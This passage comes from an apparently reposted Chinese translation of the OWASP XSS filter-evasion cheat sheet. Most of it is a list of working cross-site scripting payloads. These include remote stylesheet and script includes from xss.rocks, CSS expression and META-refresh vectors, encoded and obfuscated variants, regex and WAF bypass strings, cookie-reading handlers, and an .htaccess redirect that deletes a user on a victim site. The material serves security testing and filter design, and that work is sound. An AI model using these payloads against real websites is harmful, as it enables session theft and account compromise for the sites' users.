<p>(利用像远程样式表一样简单的形式,你可以将XSS攻击代码包含在可使用内置表达式进行重定义的样式参数里。)这只在IE和使用IE渲染模式Netscape8.1+。注意这里没有任何元素在页面中表明这页面包含了JavaScript。提示:这些远程样式表都使用了body标签,所以必须在页面中有除了攻击向量以外的内容存在时才会生效, 也就是如果是空白页的话你必须在页面添加一个字母来让攻击代码生效:</p> <blockquote> <p><LINK REL="stylesheet" HREF="http://xss.rocks/xss.css"></p> </blockquote> <p> </p> <p> </p> <h3>2.50. 远程样式表2</h3> <p> </p> <p> </p> <p>这个和上面一样有效,不过使用了<STYLE>标签替代<LINK>标签. 这个细微的变化曾经用来攻击谷歌桌面。另一方面,如果在攻击向量后有HTML标签闭合攻击向量,你可以移除末尾的</STYLE>标签。在进行跨站脚本攻击时,如不能同时使用等号或斜杠,这是非常有用的,这种情况在现实世界里不止一次发生了:</p> <blockquote> <p><STYLE>@import'http://xss.rocks/xss.css';</STYLE></p> </blockquote> <p> </p> <p> </p> <h3>2.51. 远程样式表3</h3> <p> </p> <p> </p> <p>这种方式仅在Opera 8.0(9.x不可以)中有效,但方法比较有创意. 根据RFC2616,设置一个Link头部不是HTTP1.1规范的一部分,但一些浏览器仍然允许这样做 (例如Firefox和 Opera). 这里的技巧是设置一个头部(和普通头部并没有什么区别,只是设置Link: <http://xss.rocks/xss.css>; REL=stylesheet)并且在远程样式表中包含使用了JavaScript的跨站脚本攻击向量,这一点是FireFox不支持的:</p> <blockquote> <p><META HTTP-EQUIV="Link" Content="<http://xss.rocks/xss.css>; REL=stylesheet"></p> </blockquote> <p> </p> <p> </p> <h3>2.52. 远程样式表4</h3> <p> </p> <p> </p> <p>这仅能在Gecko渲染引擎下有效并且需要在父页面绑定一个XML文件。具有讽刺意味的是 Netscape认为Gecko更安全 ,所以对绝大多数网站来说会受到漏洞影响:</p> <blockquote> <p><STYLE>BODY{-moz-binding:url("http://xss.rocks/xssmoz.xml#xss")}</STYLE></p> </blockquote> <p> </p> <p> </p> <h3>2.53. 含有分隔JavaScript的STYLE标签</h3> <p> </p> <p> </p> <p>这个XSS会在IE中造成无限循环:</p> <blockquote> <p><STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE></p> </blockquote> <p> </p> <p> </p> <h3>2.54. STYLE属性中使用注释分隔表达式</h3> <p> </p> <p> </p> <p>由Roman Ivanov创建</p> <blockquote> <p><IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"></p> </blockquote> <p> </p> <p> </p> <h3>2.55. 含表达式的IMG STYLE</h3> <p> </p> <p> </p> <p>这是一个将上面XSS攻击向量混合的方法,但确实展示了STYLE标签可以用相当复杂的方式分隔,和上面一样,也会让IE进入死循环:</p> <blockquote> <p>exp/*<A STYLE='no\xss:noxss("*//*");</p> <p>xss:ex/*XSS*//*/*/pression(alert("XSS"))'></p> </blockquote> <p> </p> <p> </p> <h3>2.56. STYLE标签(仅旧版本Netscape可用)</h3> <blockquote> <p><STYLE TYPE="text/javascript">alert('XSS');</STYLE></p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3>2.57. 使用背景图像的STYLE标签</h3> <blockquote> <p><STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A></p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3>2.58. 使用背景的STYLE标签</h3> <blockquote> <p><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE></p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3>2.59. 含STYLE属性的HTML任意标签</h3> <p> </p> <p> </p> <p>IE6.0和IE渲染引擎模式下的Netscape 8.1+并不关心你建立的HTML标签是否存在,只要是由尖括号和字母开始的即可:</p> <blockquote> <p><XSS STYLE="behavior: url(xss.htc);"></p> </blockquote> <p> </p> <p> </p> <h3>2.60. 本地htc文件</h3> <p> </p> <p> </p> <p>这和上面两个跨站脚本攻击向量有些不同,因为它使用了一个必须和XSS攻击向量在相同服务器上的.htc文件。这个示例文件通过下载JavaScript并将其作为style属性的一部分运行来进行攻击:</p> <blockquote> <p><XSS STYLE="behavior: url(xss.htc);"></p> </blockquote> <p> </p> <p> </p> <h3>2.61. US-ASCII编码</h3> <p> </p> <p> </p> <p>US-ASCII编码(由Kurt Huwig发现)。它使用了畸形的7位ASCII编码来代替8位。这个XSS攻击向量可以绕过大多数内容过滤器,但是只在主机使用US-ASCII编码传输数据时有效,或者可以自己设置编码格式。相对绕过服务器端过滤,这在绕过WAF跨站脚本过滤时候更有效。Apache Tomcat是目前唯一已知使用US-ASCII编码传输的:</p> <blockquote> <p>¼script¾alert(¢XSS¢)¼/script¾</p> </blockquote> <p> </p> <p> </p> <h3>2.62. META</h3> <p> </p> <p> </p> <p>关于meta刷新比较奇怪的是它并不会在头部中发送一个referrer-所以它通常用于不需要referrer的时候:</p> <blockquote> <p><META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"></p> </blockquote> <p> </p> <p> </p> <p><strong>2.62.1 使用数据的META</strong></p> <p> </p> <p> </p> <p>URL scheme指令。这个非常有用因为它并不包含任何可见的SCRIPT单词或JavaScript指令,因为它使用了base64编码.请查看RFC 2397寻找更多细节。你同样可以使用具有Base64编码功能的XSS工具来编码HTML或JavaScript:</p> <blockquote> <p><META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"></p> </blockquote> <p> </p> <p> </p> <p><strong>2.62.2 含有额外URL参数的META</strong></p> <p> </p> <p> </p> <p>如果目标站点尝试检查URL是否包含"http://",你可以用以下技术规避它(由Moritz Naumann提交):</p> <blockquote> <p><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"></p> </blockquote> <p> </p> <p> </p> <h3>2.63. IFRAME</h3> <p> </p> <p> </p> <p>如果允许Iframe那就会有很多XSS问题:</p> <blockquote> <p><IFRAME SRC="javascript:alert('XSS');"></IFRAME></p> </blockquote> <p> </p> <p> </p> <h3>2.64. 基于事件IFRAME</h3> <p> </p> <p> </p> <p>Iframes和大多数其他元素可以使用下列事件(由David Cross提交):</p> <blockquote> <p><IFRAME SRC=# οnmοuseοver="alert(document.cookie)"></IFRAME></p> </blockquote> <p> </p> <p> </p> <h3>2.65. FRAME</h3> <p> </p> <p> </p> <p>Frames和iframe一样有很多XSS问题:</p> <blockquote> <p><FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET></p> </blockquote> <p> </p> <p> </p> <h3>2.66. TABLE</h3> <blockquote> <p><TABLE BACKGROUND="javascript:alert('XSS')"></p> </blockquote> <p> </p> <p><strong>2.66.1. TD</strong></p> <p> </p> <p> </p> <p>和上面一样,TD也可以通过BACKGROUND来包含JavaScriptXSS攻击向量:</p> <blockquote> <p><TABLE><TD BACKGROUND="javascript:alert('XSS')"></p> </blockquote> <p> </p> <p> </p> <h3>2.67. DIV</h3> <p> </p> <p> </p> <p><strong>2.67.1. DIV背景图像</strong></p> <blockquote> <p><DIV STYLE="background-image: url(javascript:alert('XSS'))"></p> </blockquote> <p> </p> <p> </p> <p><strong>2.67.2. 含有Unicode XSS利用代码的DIV背景图像</strong></p> <p> </p> <p> </p> <p>这进行了一些修改来混淆URL参数。原始的漏洞是由RenaudLifchitz在Hotmail发现的:</p> <blockquote> <p><DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"></p> </blockquote> <p> </p> <p> </p> <p><strong>2.67.3. 含有额外字符的DIV背景图像</strong></p> <p> </p> <p> </p> <p>Rnaske进行了一个快速的XSS模糊测试来发现IE和安全模式下的Netscape 8.1中任何可以在左括号和JavaScript指令间加入的额外字符。这都是十进制的但是你也可以使用十六进制来填充(以下字符可用:1-32, 34, 39, 160, 8192-8.13, 12288, 65279):</p> <blockquote> <p><DIV STYLE="background-image: url(javascript:alert('XSS'))"></p> </blockquote> <p> </p> <p> </p> <p><strong>2.67.4. DIV表达式</strong></p> <p> </p> <p> </p> <p>一个非常有效的对抗现实中的跨站脚本过滤器的变体是在冒号和"expression"之间添加一个换行:</p> <blockquote> <p><DIV STYLE="width: expression(alert('XSS'));"></p> </blockquote> <h3>2.68. html 条件选择注释块</h3> <p> </p> <p> </p> <p>只能在IE5.0及更高版本和IE渲染引擎模式下的Netscape 8.1生效。一些网站认为在注释中的任何内容都是安全的并且认为没有必要移除,这就允许我们添加跨站脚本攻击向量。系统会在一些内容周围尝试添加注释标签以便安全的渲染它们。如我们所见,这有时并不起作用:</p> <blockquote> <p><!--[if gte IE 4]></p> <p> <SCRIPT>alert('XSS');</SCRIPT></p> <p> <![endif]--></p> </blockquote> <p> </p> <p> </p> <h3>2.69. BASE标签</h3> <p> </p> <p> </p> <p>在IE和安全模式下的Netscape 8.1有效。你需要使用//来注释下个字符,这样你就不会造成JavaScript错误并且你的XSS标签可以被渲染。同样,这需要当前网站使用相对路径例如"images/image.jpg"来放置图像而不是绝对路径。如果路径以一个斜杠开头例如"/images/image.jpg"你可以从攻击向量中移除一个斜杠(只有在两个斜杠时注释才会生效):</p> <blockquote> <p><BASE HREF="javascript:alert('XSS');//"></p> </blockquote> <p> </p> <p> </p> <h3>2.70. OBJECT标签</h3> <p> </p> <p> </p> <p>如果允许使用OBJECT,你可以插入一个病毒攻击载荷来感染用户,类似于APPLET标签。链接文件实际是含有你XSS攻击代码的HTML文件:</p> <blockquote> <p><OBJECT TYPE="text/x-scriptlet" DATA="http://xss.rocks/scriptlet.html"></OBJECT></p> </blockquote> <p> </p> <p> </p> <h3>2.71. 使用EMBED标签加载含有XSS的FLASH文件</h3> <p> </p> <p> </p> <p>如果你添加了属性allowScriptAccess="never"以及allownetworking="internal"则可以减小风险(感谢Jonathan Vanasco提供的信息):</p> <blockquote> <p><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED></p> </blockquote> <p> </p> <p> </p> <h3>2.72. 使用EMBED SVG包含攻击向量</h3> <p> </p> <p> </p> <p>该示例只在FireFox下有效,但是比上面的攻击向量在FireFox下好,因为不需要用户安装或启用FLASH。感谢nEUrOO提供:</p> <blockquote> <p><EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED></p> </blockquote> <p> </p> <p> </p> <h3>2.73. 在FLASH中使用ActionScript混淆XSS攻击向量</h3> <blockquote> <p>a="get";</p> <p>b="URL(\"";</p> <p>c="javascript:";</p> <p>d="alert('XSS');\")";</p> <p>eval(a+b+c+d);</p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3>2.74. CDATA混淆的XML数据岛</h3> <p> </p> <p> </p> <p>这个XSS攻击只在IE和使用IE渲染模式的Netscape 8.1下有效-攻击向量由Sec Consult在审计Yahoo时发现</p> <blockquote> <p><XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML></p> <p><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></p> </blockquote> <p> </p> <p> </p> <h3>2.75. 使用XML数据岛生成含内嵌JavaScript的本地XML文件</h3> <p> </p> <p> </p> <p>这和上面是一样的但是将来源替换为了包含跨站脚本攻击向量的本地XML文件(必须在同一服务器上):</p> <blockquote> <p><XML SRC="xsstest.xml" ID=I></XML></p> <p><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></p> </blockquote> <p> </p> <p> </p> <h3>2.76. XML中使用HTML+TIME</h3> <p> </p> <p> </p> <p>这是Grey Magic攻击Hotmail和Yahoo的方法。这只在IE和IE渲染模式下的Netscape8.1有效并且记得需要在HTML域的BODY标签中间才有效:</p> <blockquote> <p><HTML><BODY></p> <p><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"></p> <p><?import namespace="t" implementation="#default#time2"></p> <p><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"></p> <p></BODY></HTML></p> </blockquote> <p> </p> <p> </p> <h3>2.77. 使用一些字符绕过".js"过滤</h3> <p> </p> <p> </p> <p>你可以将你的JavaScript文件重命名为图像来作为XSS攻击向量:</p> <blockquote> <p><SCRIPT SRC="http://xss.rocks/xss.jpg"></SCRIPT></p> </blockquote> <p> </p> <p> </p> <h3>2.78. SSI(服务端脚本包含)</h3> <p> </p> <p> </p> <p>这需要在服务器端允许SSI来使用XSS攻击向量。似乎不用提示这点,因为如果你可以在服务器端执行指令那一定是有更严重的问题存在:</p> <blockquote> <p><!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://xss.rocks/xss.js></SCRIPT>'"--></p> </blockquote> <p> </p> <p> </p> <h3>2.79. PHP</h3> <p> </p> <p> </p> <p>需要服务器端安装了PHP来使用XSS攻击向量。同样,如果你可以远程运行任意脚本,那会有更加严重的问题:</p> <blockquote> <p><? echo('<SCR)';</p> <p>echo('IPT>alert("XSS")</SCRIPT>'); ?></p> </blockquote> <p> </p> <p> </p> <h3>2.80. 嵌入命令的IMAGE</h3> <p> </p> <p> </p> <p>当页面受密码保护并且这个密码保护同样适用于相同域的不同页面时有效,这可以用来进行删除用户,增加用户(如果访问页面的是管理员的话),将密码发送到任意地方等等。。。这是一个较少使用当时更有价值的XSS攻击向量:</p> <blockquote> <p><IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"></p> </blockquote> <p><strong>2.80.1. 嵌入命令的IMAGE II</strong></p> <p> </p> <p> </p> <p>这更加可怕因为这不包含任何可疑标识,除了它不在你自己的域名上。这个攻击向量使用一个302或304(其他的也有效)来重定向图片到指定命令。所以一个普通的<IMG SRC="httx://badguy.com/a.jpg">对于访问图片链接的用户来说也有可能是一个攻击向量。下面是利用.htaccess(Apache)配置文件来实现攻击向量。(感谢Timo提供这部分。):</p> <blockquote> <p>Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser</p> </blockquote> <p> </p> <p> </p> <h3>2.81. Cookie篡改</h3> <p> </p> <p> </p> <p>尽管公认不太实用,但是还是可以发现一些允许使用META标签的情况下可用它来覆写cookie。另外的例子是当用户访问网站页面时,一些网站读取并显示存储在cookie中的用户名,而不是数据库中。当这两种场景结合时,你可以修改受害者的cookie以便将JavaScript注入到其页面中(你可以使用这个让用户登出或改变他们的用户状态,甚至可以让他们以你的账户登录):</p> <blockquote> <p><META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>"></p> </blockquote> <p> </p> <p> </p> <h3>2.82. UTF-7编码</h3> <p> </p> <p> </p> <p>如果存在XSS的页面没有提供页面编码头部,或者使用了任何设置为使用UTF-7编码的浏览器,就可以使用下列方式进行攻击(感谢Roman Ivanov提供)。这在任何不改变编码类型的现代浏览器上是无效的,这也是为什么标记为完全不支持的原因。Watchfire在Google的自定义404脚本中发现这个问题:</p> <blockquote> <p><HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</p> </blockquote> <p> </p> <p> </p> <h3>2.83. 利用HTML引号包含的XSS</h3> <p> </p> <p> </p> <p>这在IE中测试通过,但还得视情况而定。它是为了绕过那些允许"<SCRIPT>"但是不允许"<SCRIPT SRC..."形式的正则过滤即"/<script[^>]+src/i":</p> <blockquote> <p><SCRIPT a=">" SRC="httx://xss.rocks/xss.js"></SCRIPT></p> </blockquote> <p> </p> <p> </p> <p>这是为了绕过那些允许"<SCRIPT>"但是不允许"<SCRIPTSRC..."形式的正则过滤即" /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i"(这很重要,因为在实际环境中出现过这种正则过滤):</p> <blockquote> <p><SCRIPT =">" SRC="httx://xss.rocks/xss.js"></SCRIPT></p> </blockquote> <p> </p> <p> </p> <p>另一个绕过此正则过滤" /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i"的XSS:</p> <blockquote> <p><SCRIPT a=">" '' SRC="httx://xss.rocks/xss.js"></SCRIPT></p> </blockquote> <p> </p> <p> </p> <p>又一个绕过正则过滤" /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i"的XSS。尽管不想提及防御方法,但如果你想允许<SCRIPT>标签但不加载远程脚本,针对这种XSS只能使用状态机去防御(当然如果允许<SCRIPT>标签的话,还有其他方法绕过):</p> <blockquote> <p><SCRIPT "a='>'" SRC="httx://xss.rocks/xss.js"></SCRIPT></p> </blockquote> <p> </p> <p> </p> <p>最后一个绕过此正则过滤" /<script((\s+\w+(\s*=\s*(?:"(.)*?"|'(.)*?'|[^'">\s]+))?)+\s*|\s*)src/i"的XSS,使用了重音符(在FireFox下无效):</p> <blockquote> <p><SCRIPT a=`>` SRC="httx://xss.rocks/xss.js"></SCRIPT></p> </blockquote> <p> </p> <p> </p> <p>这是一个XSS样例,用来绕过那些不会检查引号配对,而是发现任何引号就立即结束参数字符串的正则表达式:</p> <blockquote> <p><SCRIPT a=">'>" SRC="httx://xss.rocks/xss.js"></SCRIPT></p> </blockquote> <p> </p> <p> </p> <p>这个XSS很让人担心,因为如果不过滤所有活动内容几乎不可能防止此攻击:</p> <blockquote> <p><SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="httx://xss.rocks/xss.js"></SCRIPT></p> </blockquote> <p> </p> <p> </p> <h3>2.84. URL字符绕过</h3> <p> </p> <p> </p> <p>假定"http://www.google.com/"是不被允许的:</p> <p> </p> <p> </p> <h3><strong>2.84.1. IP代替域名</strong></h3> <blockquote> <p><A HREF="http://66.102.7.147/">XSS</A></p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3><strong>2.84.2. URL编码</strong></h3> <blockquote> <p><A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A></p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3><strong>2.84.3. 双字节编码</strong></h3> <p> </p> <p> </p> <p>(注意:还有另一种双字节编码):</p> <blockquote> <p><A HREF="http://1113982867/">XSS</A></p> </blockquote> <p> </p> <p> </p> <h3><strong>2.84.4. 十六进制编码</strong></h3> <p> </p> <p> </p> <p>每个数字的允许的范围大概是240位字符,就如你在第二位上看到的,并且由于十六进制是在0到F之间,所以开头的0可以省略:</p> <blockquote> <p><A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A></p> </blockquote> <p> </p> <p> </p> <h3><strong>2.84.5. 八进制编码</strong></h3> <p> </p> <p> </p> <p>又一次允许填充,尽管你必须保证每类在4位字符以上-例如A类,B类等等:</p> <blockquote> <p><A HREF="http://0102.0146.0007.00000223/">XSS</A></p> </blockquote> <p> </p> <p> </p> <h3><strong>2.84.6. 混合编码</strong></h3> <p> </p> <p> </p> <p>让我们混合基本编码并在其中插入一些TAB和换行,虽然不知道浏览器为什么允许这样做。TAB和换行只有被引号包含时才有效:</p> <blockquote> <p><A HREF="h</p> <p>tt p://6 6.000146.0x7.147/">XSS</A></p> </blockquote> <p> </p> <p> </p> <h3><strong>2.84.7. 协议解析绕过</strong></h3> <p> </p> <p> </p> <p>(// 替代http://可以节约很多字节).当输入空间有限时很有用(少两个字符可能解决大问题) 而且可以轻松绕过类似"(ht|f)tp(s)?://"的正则过滤(感谢Ozh提供这部分).你也可以将"//"换成"\\"。你需要保证斜杠在正确的位置,否则可能被当成相对路径URL:</p> <blockquote> <p><A HREF="//www.google.com/">XSS</A></p> </blockquote> <p> </p> <p> </p> <h3><strong>2.84.8. Google的"feeling lucky"功能1</strong></h3> <p> </p> <p> </p> <p>Firefox使用Google的"feeling lucky"功能根据用户输入的任何关键词来将用户重定向。如果你存在漏洞的页面在某些随机关键词上搜索引擎排名是第一的,你就可以利用这一特性来攻击FireFox用户。这使用了Firefox的"keyword:"协议。你可以像下面一样使用多个关键词"keyword:XSS+RSnake"。这在Firefox2.0后不再有效.</p> <blockquote> <p><A HREF="//google">XSS</A></p> </blockquote> <p> </p> <p> </p> <h3><strong>2.84.9. Google的"feeling lucky"功能2</strong></h3> <p> </p> <p> </p> <p>这使用了一个仅在FireFox上有效的小技巧,因为它实现了"feelinglucky"功能。不像下面一个例子,这个在Opera上无效因为Opera会认为只是一个老式的HTTP基础认证钓鱼攻击,但它并不是。它只是一个畸形的URL。如果你点击了对话框的确定,它就可以生效。但是在Opera上会是一个错误对话框,所以认为其不被Opera所支持,同样在Firefox2.0后不再有效。</p> <blockquote> <p><A HREF="http://ha.ckers.org@google">XSS</A></p> </blockquote> <p> </p> <p> </p> <h3><strong>2.84.10. Google的"feeling lucky"功能3</strong></h3> <p> </p> <p> </p> <p>这是一个畸形的URL只在FireFox和Opera下有效,因为它们实现了"feeling lucky"功能。像上面的例子一样,它要求你的攻击页面在Google上特定关键词排名第一(在这个示例里关键词是"google")</p> <blockquote> <p><A HREF="http://google:ha.ckers.org">XSS</A></p> </blockquote> <p> </p> <p> </p> <h3><strong>2.84.11. 移除别名</strong></h3> <p> </p> <p> </p> <p>当结合上面的URL,移除"www."会节约4个字节,总共为正确设置的服务器节省9字节:</p> <blockquote> <p><A HREF="http://google.com/">XSS</A></p> </blockquote> <p> </p> <p> </p> <h3><strong>2.84.12. 绝对DNS名称后额外的点</strong></h3> <blockquote> <p><A HREF="http://www.google.com./">XSS</A></p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3><strong>2.84.13. JavaScriptlink location</strong></h3> <blockquote> <p><A HREF="javascript:document.location='http://www.google.com/'">XSS</A></p> </blockquote> <h3> </h3> <p> </p> <h3> </h3> <p> </p> <h3><strong>2.84.14. 内容替换作为攻击向量</strong></h3> <p> </p> <p> </p> <p>假设"http://www.google.com/"会自动替换为空。我实际使用过类似的攻击向量即通过使用转换过滤器本身(示例如下)来帮助构建攻击向量以对抗现实世界的XSS过滤器:</p> <blockquote> <p><A HREF="http://www.google.com/ogle.com/">XSS</A></p> </blockquote> <h3>2.85. 字符转义表</h3> <p> </p> <p> </p> <p>下面是HTML和JavaScript中字符“<”的所有可能组合。其中大部分不会被渲染出来,但其中许多可以在某些情况下呈现出来。:</p> <blockquote> <p><</p> <p>%3C</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p><</p> <p>\x3c</p> <p>\x3C</p> <p>\u003c</p> <p>\u003C</p> <p> </p> </blockquote> <h2>3.绕过WAF的方法</h2> <p> </p> <p> </p> <p>通用问题</p> <p> </p> <p> </p> <p>• 存储型XSS</p> <p> </p> <p> </p> <p>如果攻击者已经让XSS绕过过滤器,WAF无法阻止攻击透过。</p> <p> </p> <p> </p> <p>•基于JavaScript的反射型XSS</p> <blockquote> <p>示例: <script> ... setTimeout(\"writetitle()\",$_GET[xss]) ... </script></p> <p>利用: /?xss=500); alert(document.cookie);//</p> </blockquote> <p>•基于DOM的XSS</p> <blockquote> <p>示例: <script> ... eval($_GET[xss]); ... </script></p> <p>利用: /?xss=document.cookie</p> <p> </p> </blockquote> <p> </p> <p> </p> <h3><strong>通过请求重定向构造XSS</strong></h3> <p> </p> <p> </p> <p>•存在漏洞代码:</p> <blockquote> <p>...</p> <p> header('Location: '.$_GET['param']);</p> <p>...</p> </blockquote> <p> </p> <p> </p> <p>同样包括:</p> <blockquote> <p>...</p> <p> header('Refresh: 0; URL='.$_GET['param']);</p> <p>...</p> </blockquote> <p> </p> <p> </p> <p>•这种请求不会绕过WAF:</p> <blockquote> <p>/?param=javascript:alert(document.cookie)</p> </blockquote> <p> </p> <p> </p> <p>•这种请求可以绕过WAF并且XSS攻击可以在某些浏览器执行:</p> <blockquote> <p>/?param=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=</p> </blockquote> <p> </p> <p> </p> <p><strong>绕过</strong>WAF可用<strong>字符串.</strong></p> <blockquote> <p><Img src = x onerror = "javascript: window.onerror = alert; throw XSS"></p> <p><Video> <source onerror = "javascript: alert (XSS)"></p> <p><Input value = "XSS" type = text></p> <p><applet code="javascript:confirm(document.cookie);"></p> <p><isindex x="javascript:" οnmοuseοver="alert(XSS)"></p> <p>"></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT></p> <p>"><img src="x:x" οnerrοr="alert(XSS)"></p> <p>"><iframe src="javascript:alert(XSS)"></p> <p><object data="javascript:alert(XSS)"></p> <p><isindex type=image src=1 οnerrοr=alert(XSS)></p> <p><img src=x:alert(alt) οnerrοr=eval(src) alt=0></p> <p><img src="x:gif" οnerrοr="window['al\u0065rt'](0)"></img></p> <p><iframe/src="data:text/html,<svg οnlοad=alert(1)>"></p> <p><meta content="
 1 
; JAVASCRIPT: alert(1)" http-equiv="refresh"/></p> <p><svg><script xlink:href=data:,window.open('https://www.google.com/')></script</p> <p><meta http-equiv="refresh" content="0;url=javascript:confirm(1)"></p> <p><iframe src=javascript:alert(document.location)></p> <p><form><a href="javascript:\u0061lert(1)">X</p> <p></script><img/*%00/src="worksinchrome:prompt(1)"/%00*/οnerrοr='eval(src)'></p> <p><style>//*{x:expression(alert(/xss/))}//<style></style> </p> <p>On Mouse Over</p> <p><img src="/" =_=" title="οnerrοr='prompt(1)'"></p> <p><a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=javascript:alert(1)>ClickMe</p> <p><script x> alert(1) </script 1=2</p> <p><form><button formaction=javascript:alert(1)>CLICKME</p> <p><input/οnmοuseοver="javaSCRIPT:confirm(1)"</p> <p><iframe src="data:text/html,%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3C%2F%73%63%72%69%70%74%3E"></iframe></p> <p> </p> </blockquote> <p> </p> <p> </p> <h3>3.1. Alert混淆以绕过过滤器</h3> <blockquote> <p>(alert)(1)</p> <p>a=alert,a(1)</p> <p>[1].find(alert)</p> <p>top[“al”+”ert”](1)</p> <p>top[/al/.source+/ert/.source](1)</p> <p>al\u0065rt(1)</p> <p>top[‘al\145rt’](1)</p> <p>top[‘al\x65rt’](1)</p> <p>top[8680439..toString(30)](1)</p> <p> </p> </blockquote> <h2>4.作者和主要编辑</h2> <p> </p> <p> </p> <p>Robert "RSnake" Hansen</p> <p> </p> <h2>5.贡献者</h2> <p> </p> <p> </p> <p>Adam Lange</p> <p> </p> <p> </p> <p>Mishra Dhiraj</p> <p> </p> <p> </p> <h3><strong>版权与许可</strong></h3> <p> </p> <p> </p> <blockquote> <p>版权所有:OWASP基金会©</p> <p> </p> <p>本文档基于 Creative Commons Attribution ShareAlike3.0 license 发布。任何重用或发行,都必须向他人明确该文档的许可条款。 http://creativecommons.org/licenses/by-sa/3.0/</p> </blockquote> <p>JSON劫持</p> <p>登录框漏洞</p> <p>xsser进阶</p> <p>总结了下自己的XSS绕过思路和心得!</p> <p>https://secvul.com/topics/259.html</p> </div> </div> </div> </div> </div> <!--PC和WAP自适应版--> <div id="SOHUCS" sid="1188145431448756224"></div> <script type="text/javascript" src="/views/front/js/chanyan.js"></script> <!-- 文章页-底部 动态广告位 --> <div class="youdao-fixed-ad" id="detail_ad_bottom"></div> </div> <div class="col-md-3"> <div class="row" id="ad"> <!-- 文章页-右侧1 动态广告位 --> <div id="right-1" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div class="youdao-fixed-ad" id="detail_ad_1"> </div> </div> <!-- 文章页-右侧2 动态广告位 --> <div id="right-2" class="col-lg-12 col-md-12 col-sm-4 col-xs-4 ad"> <div 